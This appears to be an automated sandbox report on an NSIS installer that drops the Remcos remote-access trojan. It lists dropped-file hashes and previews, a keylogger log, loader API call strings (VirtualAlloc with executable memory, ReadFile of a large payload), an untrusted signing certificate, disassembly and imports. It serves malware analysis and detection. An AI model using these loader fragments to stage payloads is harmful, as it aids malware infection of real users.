                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):60
                                                                                                                                                            Entropy (8bit):4.51038309657817
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:sEMBQEJkJVEj/hUxQoXUn:eixvUn
                                                                                                                                                            MD5:2CB64A543852D3D1DD18C426FCFF7EC1
                                                                                                                                                            SHA1:5D6528011529048B11B137B0390707348D10EE6B
                                                                                                                                                            SHA-256:B013D0A5B5D00D70C31F8C7DF4056A0B592A08FB7E643ABE0C407920D1C1D4EC
                                                                                                                                                            SHA-512:65FEFAD42E4651A693D832A5BA477654CC05C443EC8CFF1B7083ADB474633C33FFC9F5851CE78B2B056B2FE198D5F7705CC51386556CB10B86BCDDDEEC71A216
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:kernel32::VirtualAlloc(i 0,i 63516672, i 0x3000, i 0x40)p.r1
                                                                                                                                                            Process:C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):52
                                                                                                                                                            Entropy (8bit):4.0914493934217315
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:sBa99k1NoCFOn:KankVg
                                                                                                                                                            MD5:5D04A35D3950677049C7A0CF17E37125
                                                                                                                                                            SHA1:CAFDD49A953864F83D387774B39B2657A253470F
                                                                                                                                                            SHA-256:A9493973DD293917F3EBB932AB255F8CAC40121707548DE100D5969956BB1266
                                                                                                                                                            SHA-512:C7B1AFD95299C0712BDBC67F9D2714926D6EC9F71909AF615AFFC400D8D2216AB76F6AC35057088836435DE36E919507E1B25BE87B07C911083F964EB67E003B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:kernel32::SetFilePointer(i r5, i 1200 , i 0,i 0)i.r3
                                                                                                                                                            Process:C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):56
                                                                                                                                                            Entropy (8bit):4.215189574580281
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:sAAEVvjsKT84n:fLf9
                                                                                                                                                            MD5:3E9304766222383FF45E12C3AD04B4B7
                                                                                                                                                            SHA1:A922324D6D61D2E50092F8B0BBA48CF0D4C3B5B2
                                                                                                                                                            SHA-256:00F5FE07AEB64A3F06562A7D0AE2E51BFEF76B298CCFD7D4A0C95520A4BD55FB
                                                                                                                                                            SHA-512:7A5E3789CF3BF4F03D5BD67F533B8B9FF89AE47FBF7A34C67848239FD6418A34417B9A75B29EC999279F25F6AC829008F92E743F6DDE24FA8A3EE5A67DDC2615
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:kernel32::ReadFile(i r5, i r1, i 63516672,*i 0, i 0)i.r3
                                                                                                                                                            Process:C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):292179
                                                                                                                                                            Entropy (8bit):1.2493548573395048
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:768:7QKiKEeCZtdhE+Iol8n8VxRcRFM2VXauqI9L4uKTu1jiXUHMVAXARhdE8F2la2s9:7IP2+ISm8H92U2jjX98sznUxzNk
                                                                                                                                                            MD5:3FDA479ECE5250D5630666DAA0392148
                                                                                                                                                            SHA1:5065A4639DC730F5150E84B0EA4E1E6F39F93610
                                                                                                                                                            SHA-256:DDE8F450A25217ED6B8E1B6A45344602E45AF4C51E60C292C5FDB072492C6EDC
                                                                                                                                                            SHA-512:5298655DA24F7F64A186AD37E04CDE9B074C1003F7D6DA3B2C2F6BD173BFE8AD677261B045AB45A28405BA317246BAEC14156B644E0FD1D0859A0F5C76AC7659
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:...............................................................w.........................................................................................7........................................@.A.............................................]...W.....&.......................l.......G...............................Z.....=..................#.....]...................h...........X........................................,...................................................!.................................L.......................6......R................................".........................................................D.......................................i...................................................<............Z.q...............................................................N......................)...%................J.............................................................d...w..4..F.......................Q.............................................N.............
                                                                                                                                                            Process:C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):411434
                                                                                                                                                            Entropy (8bit):7.040136347835866
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6144:sQPTzdMZNE30GtXY23iyUgiSgBCPnl7g8j+40cGZCuxwmMkkaTflU9NN:soMZ6koZyyUkgBCt7g8GFwLmfe
                                                                                                                                                            MD5:B9659DCCBBA33BAEE160D30FE00CC89B
                                                                                                                                                            SHA1:D1DE335A2070CCD18E29B2DDC721ECAC2B19BC5A
                                                                                                                                                            SHA-256:F450D63442FB189B12D7A89703305D33C9D33E3F10A1DBEA9F9E5C89094F4599
                                                                                                                                                            SHA-512:A7C20CAA63A81482E1B40A37B1250AC56EA675C5A7FD77E76F06F859293A7CE899D5B4A17CC30FCDD5E9A025B32C2E6C800431F7B097B64A19E25D1A782B36A1
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:..................................HH...........#........Q.........Y.....++++++.''...."..........O..................................................................h.....................NNN....................kkk..............EEE.......V.:....................<<<.........'.................T.......YY.11...........$$. ........CCCCC..VV.............]]................A.............&&...r.......................r....6.......99.....zzzz........U....kkkk..............a...........&.....MMM......jj..........W...q.................T..+..a...RR........................................................R......................i.....................555555..............XXX.a...Y........ttttt................S..................Q....O.\\.@..KKKK....u...o....................-...,,,......RR..(......\\................~~..s....dddd.)...yyy..ppp........$. .......Q.................................{.........HHH.....\.....||||||........Z...........2.\...DD...........TT...aa...88........"""............\\\\...RR........
                                                                                                                                                            Process:C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):126301
                                                                                                                                                            Entropy (8bit):4.601677051624128
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:H8y2V8NAbzjXe44sxD1o0khGx/FsJz9eaM2TOcmqmRAMb+Oc2amKWTPNhvHVC:1Cn3xohGtFst9eATOjfb+Cf4
                                                                                                                                                            MD5:662EFD94D07319132DD7323E1F23F80D
                                                                                                                                                            SHA1:A714429C40EEA90C5E1F14C4658E1B5F73B81E36
                                                                                                                                                            SHA-256:16821FD457D9EA2E00C594AB16C259D38CE122169CD7A01AA24F986BC03A31E5
                                                                                                                                                            SHA-512:807A777B5D67EC90513FF629FD4CF3DD902E7A409089A733E2EE54CEB3AF0D94872B44304EDCE6E9D30B671206C4ACC54894557653C0EEA3A814E2F2E97E5910
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:...kkkk.%............................}.LLLL.........<............n................**........zz..........jj............-.....qqq........................77.....................................................bb..V...A..\.VV.......::::................PPP....CCC............................UU....ppp....................9.....................,,.||......UUUU..X........./...........<........bbb.....".............888.....................99.................''''''.b....................................""...........................................TTTT..hh..........mm............................g.....'.....ii...77.......aaa.......`........+...k.tttt.....F.............ZZZZ.................qq.......II.................++.....................:.kkk..................)))))).........._...$............,,......;....................||||||.................,................LLL............................YYYYYYY..9..:.{.#...p...........................................ffff..........t....tt...........nnn............
                                                                                                                                                            Process:C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe
                                                                                                                                                            File Type:Matlab v4 mat-file (little endian) \201, numeric, rows 0, columns 2231369728
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):353645
                                                                                                                                                            Entropy (8bit):1.2538138406741832
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:768:QwFUr4LBr+nP4KLTNr7l+NPMieWGRzoHMAVmror37c+dOGemynI2qXBpaB1KnvZF:xNwXvgOEdG/362B3hTTpCvTqEoYj1NVd
                                                                                                                                                            MD5:C7678C7ABC60CD46FA77D31DFB3705C5
                                                                                                                                                            SHA1:9C5B2543D675E5F79A5D250DF1A006A9D6ED369F
                                                                                                                                                            SHA-256:D71B8F9198FBA272CC852D5138C0DF0F8B3FEA34D0B7F54477151DBC386A2E2E
                                                                                                                                                            SHA-512:92337E8C8914FA9E511F45EE0AC16757EE1353030EBE607D89781E9CBC0798284ABEFAF817A5D163DD4A220423C795EE9ACC091248796F404AE5D8A69898E77C
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:...............................E.....Y........................=.........S........[....*.......h...........................................Y......@............f.................../............................Y........................%..K..............................................................o...............................................'..............h.....................p......{.........................................-..........................................................Z...............................Q........................@..M..........................C...............................................................................................................5....#..)..........h............................;...............1.....f...........................................................................sa.........~..........................................}......E.....................................................!............................................9..
                                                                                                                                                            Process:C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):218684
                                                                                                                                                            Entropy (8bit):1.2416084153974396
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:768:SYidJwGdzSK6YJ5tzZw7gPUfn68BHl6YXfzxoCNmrDAyG6xNzvz7vf5EBCPopS2i:bMwvZzQ/fupcJQwV
                                                                                                                                                            MD5:F948A12427D820170B9235150CF4DDFA
                                                                                                                                                            SHA1:5851842536C0F5B6965201D49247D7DB1476D8CD
                                                                                                                                                            SHA-256:4E5F31A6FA33DD0F00D0F7A21837DB4F6D6D911E4B4A0FE5C85CA861D168D3B3
                                                                                                                                                            SHA-512:3FB404300705B8A52C01E3292B519846E4301D6FB1EC4DC617003BDC57910F825DF44EBB589FD742D4B240E7B3BC845760688BFB6D5B7F3FC781E26C881E0062
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.......%.................................>...........N.......&............H...........................F.................'...................................................\............;...........................Y......................................................V.............................................................'..............................................P..................t......................}..Z.............................................`.....................+....................t....................K........................................Y......<...................................................................n.........|.......i...............................................i........Z..........T.......'......................G....................................................................................9...,.............W.....................w.....C.R.......W...........................................................................................
                                                                                                                                                            Process:C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):279926
                                                                                                                                                            Entropy (8bit):1.2503006973081776
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:768:fkP/CW+tlCgb/N1mtsAHEE3PQLfC6yDCU3Eh1myIwlgdNuJdMZnt7fieXM96EcUB:y69hb/IoLzNcfpmZmiMFU2q
                                                                                                                                                            MD5:7B8917C08C21562A65980700BC7262B4
                                                                                                                                                            SHA1:DC1E4ABD4315089A9DB7ED29667870560B1CEC2D
                                                                                                                                                            SHA-256:4DA6A2F1E251087138A3BE325BFFDC419A14C75F2AF1EEEF4B9BE9305980A9A3
                                                                                                                                                            SHA-512:28BE11E8D4EB6B2F64948A58C2D9EC4BA3AA360976FC543A6A53B1E5C95A43F16A5C5C5234422A30C7829E3E42B4819FD18C73B571750B1112FA2C48FB6DAC78
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.....0....6........................C.................................1...................................y..;.........Y........................................B...Q.........................c........................................._.....................................................................................a...............$....................................................{...................*.......................................<..............B.....................2...............m..............t.......%.y................I................................................................................:............O..;........................)...................................:..............W.......................&..........>.........F...................................................f...................................M..................}..............................................................................................D.....................................
                                                                                                                                                            Process:C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):340767
                                                                                                                                                            Entropy (8bit):1.2570818433850908
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:768:fVg8GJOolumncV3wQ8pJ1Z1KgFF4DjViAfXJX4YzIn3k0bn6xJqWg+SR2m8WGm3F:EKwpcLZCYfFmHVkBr1m7z5A3s
                                                                                                                                                            MD5:3D1A66587435447ED555211492FE35CA
                                                                                                                                                            SHA1:66BE289F7D89D93F0455DE1979573C696FC74417
                                                                                                                                                            SHA-256:F5475A113FF497D77AB285A90806847411BB06A168DC059BAC7B036C8DBEC034
                                                                                                                                                            SHA-512:FB0DA89611803651EC341184E401273BF54F5B0C0620907A3F5F6176F53C1752FDB518A70F0D58AA541473F723A219D62C2B6324906ECA03B498873EB4F7ACB7
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:......................xO.................o...............................................................................2........................_...................w..........................................L.............................................................5............2...$.......{..............................g...^...................|gL......................................p..........~............@.....................................1......................................................................t......).....................................................................8..............................................Z..............%............9..............q..........................7.]....T..............................F........m...=.........................x.......E...{........................................q.....................}...............................................................(.x....;. ........................A.............................
                                                                                                                                                            Process:C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe
                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):454
                                                                                                                                                            Entropy (8bit):4.232461495642593
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:vmlweyjFY+aMd/YwL+2ICFCFlBnphDlF4Z:u6eoFQMd/OCFC/pDlE
                                                                                                                                                            MD5:2F335B491E3F499D1FB1103ADE46C288
                                                                                                                                                            SHA1:EAC11206C6E9CD61691C4F68A3F3DF626D652582
                                                                                                                                                            SHA-256:8445841DC0CBB4EF8851D19A7C775AEE95EB2FBBFB09F4CA11BFFEDEC3448393
                                                                                                                                                            SHA-512:CCA4428B19CE486A9B74141DB94A5AB6A2AF1F9ABB73525E2D02301DC1C8CDBEAEFA0596673CAB893D53C9017AA40F9FCFA1F7F51011B798155AC21D4F5C8146
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:jakets utinam demibarrel nonpunishment unpaginated sprognormeringen fangehullet,biogenous daadlse sententia fejldisponeringernes irised.svrtnings erics rigsvaabenet undersgelsesagentens endevrdiers unspecialisings sierozem rhinophis geno..gourmandise festskriftet scrapmonger centesimation autovalet syrner optllinger..typenavn dampruters anacahuita excommunicates downs,clocer passu pogonias mervrdiomstningsafgifters tjenestekarls ependytes skrddersyr,
                                                                                                                                                            Process:C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):449285
                                                                                                                                                            Entropy (8bit):1.2478546527758632
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:768:mzYy5Xb3bD8LArwiazpv2tqx5AzkOH8lJ1AZREYo92qDEZzg0oIgm2y+mPzKNTNe:G7FXQlbfbGni1NeUVNAQbWYM4uNpsjGf
                                                                                                                                                            MD5:70F310C61DAF7C0AFA519CE8020B63A6
                                                                                                                                                            SHA1:4D08AF22712C9DBE80833912BE5B63993FBFC2F7
                                                                                                                                                            SHA-256:A74091148BE59AC7A598D269CBBBAC6861DE6BA81368AA621D506FCC6AB38DC6
                                                                                                                                                            SHA-512:2E3D0BC1C2C1BBAB4693088632DF8597E0B9CC25E432C5918E035A7F2AB2AFD854CF19F938128DC1EF31B215BAFA1F8FBAC8FACF6C50F73574023100FBCBD794
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.....................P......n......U..............W.......o...........................................................N.....................e........M...................................oC.........R..f...........................................................................W...................?..Z................B...........................................m....................a.....#.........4...........................(.......................}...................C....................1...........................*................................_..........r.............M........................2....................Q.................;....V...........Q........Ls........................................................................................................5...........................................................................................................`.......................@...................O.....................................i........_.............................
                                                                                                                                                            Process:C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):242
                                                                                                                                                            Entropy (8bit):3.3597185255783386
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:6lfFoEl55YcIeeDAlMlfFocR1SlfFoMAbWAv:6leElhecmle/leMAbW+
                                                                                                                                                            MD5:791414424DB598F5B235FDA3C9E68E23
                                                                                                                                                            SHA1:765A7E8091CD5B6BCB04668E519E40015DC2F87D
                                                                                                                                                            SHA-256:3024ABB8F4CAF1BA44B3A01C435FCA8346DE61DACA2B53489DCB8D14580D35D5
                                                                                                                                                            SHA-512:8CD5D957FC004F6AD194CE3AE9E1C2FAC8042B34BCE1E854A000F373139098B3C03CFE112D40E1F421AE90613D80C6F05260270816E69471C40F5E2A87930FB6
                                                                                                                                                            Malicious:true
                                                                                                                                                            Yara Hits:
                                                                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Roaming\kaourts.dat, Author: Joe Security
                                                                                                                                                            Preview:....[.2.0.2.4./.1.1./.0.5. .0.4.:.0.3.:.2.6. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.2.0.2.4./.1.1./.0.5. .0.4.:.0.3.:.2.6. .R.u.n.].........[.2.0.2.4./.1.1./.0.5. .0.4.:.0.3.:.2.9. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                            Entropy (8bit):7.953971896725772
                                                                                                                                                            TrID:
                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                            File name:z120X20SO__UK__EKMELAMA.exe
                                                                                                                                                            File size:840'016 bytes
                                                                                                                                                            MD5:cba1a6515c0ac0889f04664fedaec3e3
                                                                                                                                                            SHA1:ff6672ec2a7960cfee821abedf3f2ca71e396206
                                                                                                                                                            SHA256:b39398684ecb03eb8ec7e1288b01cb1cd0d14b263ccb3579456592c1b234617b
                                                                                                                                                            SHA512:7bf17b3b549503a1c5bb2abfc7ea6c2fde674282059c9c896532ad8721f1f2f0120420cb4ba44e5b4726b4454aaae6572224454886b1233c44d160e79f640151
                                                                                                                                                            SSDEEP:12288:B0kvxRgbWjWwCpAx0CGznjfIpEj5pWly3X4UxZYQSxRR1k6tZcFjacQ34rmQ:hvxibaQS0dIpEj5YlXuZ4xT1/4IcL
                                                                                                                                                            TLSH:5B05234F6A76C417CB1A4130A6FAF98C13EBAE6A18C3C76B17817749783059B0C2F895
                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG..sw..PG..VA..PG.Rich.PG.........PE..L... ..`.................f...|......H3............@
                                                                                                                                                            Icon Hash:22e4c2e3e4d6d24c
                                                                                                                                                            Entrypoint:0x403348
                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                            Digitally signed:true
                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                            Time Stamp:0x60FC9220 [Sat Jul 24 22:20:16 2021 UTC]
                                                                                                                                                            TLS Callbacks:
                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                            OS Version Major:4
                                                                                                                                                            OS Version Minor:0
                                                                                                                                                            File Version Major:4
                                                                                                                                                            File Version Minor:0
                                                                                                                                                            Subsystem Version Major:4
                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                            Import Hash:ced282d9b261d1462772017fe2f6972b
                                                                                                                                                            Signature Valid:false
                                                                                                                                                            Signature Issuer:CN=Rorippa, O=Rorippa, L=Studholme, C=GB
                                                                                                                                                            Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                                                            Error Number:-2146762487
                                                                                                                                                            Not Before, Not After
                                                                                                                                                            • 25/08/2024 05:15:26 25/08/2027 05:15:26
                                                                                                                                                            Subject Chain
                                                                                                                                                            • CN=Rorippa, O=Rorippa, L=Studholme, C=GB
                                                                                                                                                            Version:3
                                                                                                                                                            Thumbprint MD5:A16D7F890F060C28E6CA92F10E2A603D
                                                                                                                                                            Thumbprint SHA-1:2428FB27B0C81A15DE060E1C3C63B37CD0FAB366
                                                                                                                                                            Thumbprint SHA-256:1391ED76B0F0B8262FCAF3A0CAA6128F22A98EC77224AD1E820A3E2D7AEA4882
                                                                                                                                                            Serial:2B11A5F0D4B6DD29F2FA89FB56B222B94F935EE6
                                                                                                                                                            Instruction
                                                                                                                                                            sub esp, 00000184h
                                                                                                                                                            push ebx
                                                                                                                                                            push esi
                                                                                                                                                            push edi
                                                                                                                                                            xor ebx, ebx
                                                                                                                                                            push 00008001h
                                                                                                                                                            mov dword ptr [esp+18h], ebx
                                                                                                                                                            mov dword ptr [esp+10h], 0040A198h
                                                                                                                                                            mov dword ptr [esp+20h], ebx
                                                                                                                                                            mov byte ptr [esp+14h], 00000020h
                                                                                                                                                            call dword ptr [004080B8h]
                                                                                                                                                            call dword ptr [004080BCh]
                                                                                                                                                            and eax, BFFFFFFFh
                                                                                                                                                            cmp ax, 00000006h
                                                                                                                                                            mov dword ptr [0042F42Ch], eax
                                                                                                                                                            je 00007F6DE07FD543h
                                                                                                                                                            push ebx
                                                                                                                                                            call 00007F6DE08006A6h
                                                                                                                                                            cmp eax, ebx
                                                                                                                                                            je 00007F6DE07FD539h
                                                                                                                                                            push 00000C00h
                                                                                                                                                            call eax
                                                                                                                                                            mov esi, 004082A0h
                                                                                                                                                            push esi
                                                                                                                                                            call 00007F6DE0800622h
                                                                                                                                                            push esi
                                                                                                                                                            call dword ptr [004080CCh]
                                                                                                                                                            lea esi, dword ptr [esi+eax+01h]
                                                                                                                                                            cmp byte ptr [esi], bl
                                                                                                                                                            jne 00007F6DE07FD51Dh
                                                                                                                                                            push 0000000Bh
                                                                                                                                                            call 00007F6DE080067Ah
                                                                                                                                                            push 00000009h
                                                                                                                                                            call 00007F6DE0800673h
                                                                                                                                                            push 00000007h
                                                                                                                                                            mov dword ptr [0042F424h], eax
                                                                                                                                                            call 00007F6DE0800667h
                                                                                                                                                            cmp eax, ebx
                                                                                                                                                            je 00007F6DE07FD541h
                                                                                                                                                            push 0000001Eh
                                                                                                                                                            call eax
                                                                                                                                                            test eax, eax
                                                                                                                                                            je 00007F6DE07FD539h
                                                                                                                                                            or byte ptr [0042F42Fh], 00000040h
                                                                                                                                                            push ebp
                                                                                                                                                            call dword ptr [00408038h]
                                                                                                                                                            push ebx
                                                                                                                                                            call dword ptr [00408288h]
                                                                                                                                                            mov dword ptr [0042F4F8h], eax
                                                                                                                                                            push ebx
                                                                                                                                                            lea eax, dword ptr [esp+38h]
                                                                                                                                                            push 00000160h
                                                                                                                                                            push eax
                                                                                                                                                            push ebx
                                                                                                                                                            push 00429850h
                                                                                                                                                            call dword ptr [0040816Ch]
                                                                                                                                                            push 0040A188h
                                                                                                                                                            Programming Language:
                                                                                                                                                            • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x85440xa0.rdata
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x440000x75c8.rsrc
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0xcbf700x11e0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x80000x29c.rdata
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                            .text0x10000x64570x6600f6e38befa56abea7a550141c731da779False0.6682368259803921data6.434985703212657IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                            .rdata0x80000x13800x1400569269e9338b2e8ce268ead1326e2b0bFalse0.4625data5.2610038973135005IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                            .data0xa0000x255380x60017edd496e40111b5a48947c480fda13cFalse0.4635416666666667data4.133728555004788IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                            .ndata0x300000x140000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                            .rsrc0x440000x75c80x7600f3ff3f11b2041a9d77c9397348fc53c5False0.4304157838983051data5.160770902636366IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                            RT_ICON0x443580x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.30840248962655603
                                                                                                                                                            RT_ICON0x469000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.40361163227016883
                                                                                                                                                            RT_ICON0x479a80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2688EnglishUnited States0.5191897654584222
                                                                                                                                                            RT_ICON0x488500x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.4540983606557377
                                                                                                                                                            RT_ICON0x491d80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152EnglishUnited States0.6597472924187726
                                                                                                                                                            RT_ICON0x49a800x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 672EnglishUnited States0.7096774193548387
                                                                                                                                                            RT_ICON0x4a1480x568Device independent bitmap graphic, 16 x 32 x 8, image size 320EnglishUnited States0.5751445086705202
                                                                                                                                                            RT_ICON0x4a6b00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.599290780141844
                                                                                                                                                            RT_DIALOG0x4ab180x144dataEnglishUnited States0.5216049382716049
                                                                                                                                                            RT_DIALOG0x4ac600x100dataEnglishUnited States0.5234375
                                                                                                                                                            RT_DIALOG0x4ad600x11cdataEnglishUnited States0.6091549295774648
                                                                                                                                                            RT_DIALOG0x4ae800x60dataEnglishUnited States0.7291666666666666
                                                                                                                                                            RT_GROUP_ICON0x4aee00x76dataEnglishUnited States0.6610169491525424
                                                                                                                                                            RT_VERSION0x4af580x32cdataEnglishUnited States0.48645320197044334
                                                                                                                                                            RT_MANIFEST0x4b2880x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                                                                                                                                            DLLImport
                                                                                                                                                            ADVAPI32.dllRegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
                                                                                                                                                            SHELL32.dllSHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
                                                                                                                                                            ole32.dllIIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
                                                                                                                                                            COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                                                                                                                            USER32.dllSetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, GetSysColor, SetCursor, GetWindowLongA, SetClassLongA, SetWindowPos, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
